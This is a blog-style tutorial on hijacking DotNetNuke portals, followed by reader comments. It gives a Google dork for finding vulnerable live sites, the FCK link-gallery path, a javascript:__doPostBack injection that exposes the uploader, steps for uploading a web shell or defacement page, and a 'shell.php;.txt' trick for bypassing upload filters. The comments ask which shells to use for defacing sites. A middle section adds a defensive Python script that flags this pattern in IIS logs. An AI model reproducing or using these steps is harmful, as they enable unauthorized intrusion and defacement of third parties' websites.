Dot Net Nuke Hacking

DNN Portal Hijacking Tutorial

______________________________________________________
Author: Rishabh Saxena
Facebook Page:
Learn to hack (https://www.facebook.com/teamLTH)
______________________________________________________________


Q) What is DNN ?
A) DNN stands for Dot Net Nuke. It is an open source CMS [content management system] based on the .NET platform. It allows management of websites without much technical knowledge and supports a large number of third-party apps. It requires Internet Information Services 6 [IIS 6.0] and ASP.NET, and supports SQL Server 2003 and 2008.


Q) What is this hack about?

A) There is a security hole in DNN which allows any attacker to upload data to the server. This way you can upload a shell to the server.

So let's start!
______________________________

Steps:


1) Google dork for vulnerable websites: inurl:/tabid/36/language/en-US/Default.aspx

2) After searching the above dork in Google you will come across many sites; open any one you like.

3) You will see /Home/tabid/36/Language/en-US/Default.aspx in the URL.

4) Just replace it with /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx .

5) Now you will see a page titled **LINK GALLERY** with some upload options.

6) Now choose the option "File".

7) Then inject the following JavaScript code in the browser address bar: javascript:__doPostBack('ctlURL$cmdUpload','')

Explanation for ctlURL$cmdUpload: ctlURL is the URL control, and cmdUpload is its upload option, which allows an attacker to upload a file.
Sometimes the browser removes *javascript* from this command while copy-pasting, so after pasting the command in the browser just check whether **javascript** is still written there. If it isn't, write *javascript* before :__doPostBack('ctlURL$cmdUpload','') so the command always looks like:
javascript:__doPostBack('ctlURL$cmdUpload','')

8) Now the "Choose file" option will come up.



9) Now choose a file, select root and click on "Upload selected file"; upload any deface HTML page or any shell and start having fun

10) Now you can view your file/shell at portals/0/uploadedfile.fileformat

11) Additional step: Sometimes the website admin changes the upload permissions and adds a filter to the uploader so that you can only upload .jpeg/.jpg/.txt files.
To bypass this filter just rename the shell to
shell.php;.txt
shell.php;.jpg
or any other extension which is allowed.
This way, when you request the page/shell in the browser, it will read only up to .php; it won't read .txt, as the ";" sign ends the request.
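
From the defender's side, the request sequence in the steps above leaves a recognizable trail in IIS logs. The following Python triage script is an added example, not part of the original tutorial; the reduced field list, the severity labels and the sample log lines (documentation IP addresses) are constructed assumptions.

```python
"""Flag the request pattern from this tutorial in IIS W3C logs (defensive triage)."""
import re

GALLERY = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"  # path from the tutorial
# Script-capable extension at the end or before ';', or any ';' in the file name (step 11).
RISKY_NAME = re.compile(r"\.(aspx?|ashx|asmx|php|cer|asa)(;|$)|;", re.I)

# Constructed sample log; 203.0.113.x / 198.51.100.x are documentation addresses.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2013-05-01 10:00:01 GET /Home/tabid/36/language/en-US/Default.aspx - 198.51.100.7 200
2013-05-01 10:02:10 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 203.0.113.9 200
2013-05-01 10:02:40 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 203.0.113.9 200
2013-05-01 10:03:05 GET /portals/0/report.php;.txt - 203.0.113.9 200
2013-05-01 10:04:00 GET /portals/0/logo.jpg - 198.51.100.7 200
2013-05-01 10:05:00 GET /portals/0/page.aspx - 198.51.100.8 404
"""

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def triage(text):
    """Return (severity, client_ip, uri) findings in log order."""
    findings, uploaders = [], set()
    for r in parse_w3c(text):
        uri, ip = r["cs-uri-stem"], r["c-ip"]
        path = uri.lower()
        if path == GALLERY:
            if r["cs-method"] == "POST":
                uploaders.add(ip)  # postback to the upload control
                findings.append(("high", ip, uri))
            else:
                findings.append(("info", ip, uri))
        elif path.startswith("/portals/") and RISKY_NAME.search(path.rsplit("/", 1)[-1]):
            # Served successfully to a client that just used the uploader: likely web shell.
            hit = ip in uploaders and r["sc-status"].startswith("2")
            findings.append(("critical" if hit else "medium", ip, uri))
    return findings

if __name__ == "__main__":
    for sev, ip, uri in triage(SAMPLE_LOG):
        print(f"{sev:8} {ip:15} {uri}")
```

Because the parser reads the #Fields directive, it works with whatever column order the server is configured to log, as long as the method, URI stem, client IP and status fields are enabled.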

______________________________________________________

Example scenario :
I googled the dork and it displayed a list of some sites.
I opened one of the sites listed there:
http://www.*****.@@home/tabid/36/language/en-US/default.aspx

Then I replaced **home/tabid/36/language/en-US/default.aspx** with **/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx**

So the edited URL was like this:

http://www.*****.@@/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Then I clicked on the option "File". Then in the address bar I injected this JavaScript: javascript:__doPostBack('ctlURL$cmdUpload','')

Then a "Choose file" option came up.
I browsed to my page/shell and clicked on "Upload selected file"; the file was uploaded to: http://www.*****.@@/portals/0/uploadedfile.format
_______________________________________________________

Well, I am assuming that readers have knowledge of some of the terms mentioned above, like:
CMS :- http://en.wikipedia.org/wiki/Content_management_system
DNN :- http://en.wikipedia.org/wiki/DotNetNuke
.NET :- http://en.wikipedia.org/wiki/.NET_Framework
SHELL :- http://en.wikipedia.org/wiki/Shell_(computing)

If you don't know them, just read the links mentioned above.

NOTE: This tutorial is for educational purposes only. Use at your own risk. The author and the blog are not responsible for any consequence, be it good or bad!!

Original Author: Rishabh Saxena [Member Of Computer Korner]

3 comments:

  1. I have checked this on many websites, but after the link gallery page and adding that javascript, no "choose file" comes up. Tell me what's the problem?

    ans at 143ajaygupta@gmail.com

  2. There is no problem, DNN is very old. They are patched now; if no upload option is found, check with other sites.

  3. Can you tell me a good and simple shell.
    I tried r57 but it shows a text, also I tried killer3n but I can't understand it.

    Please tell a shell for purpose of just replacing index.html
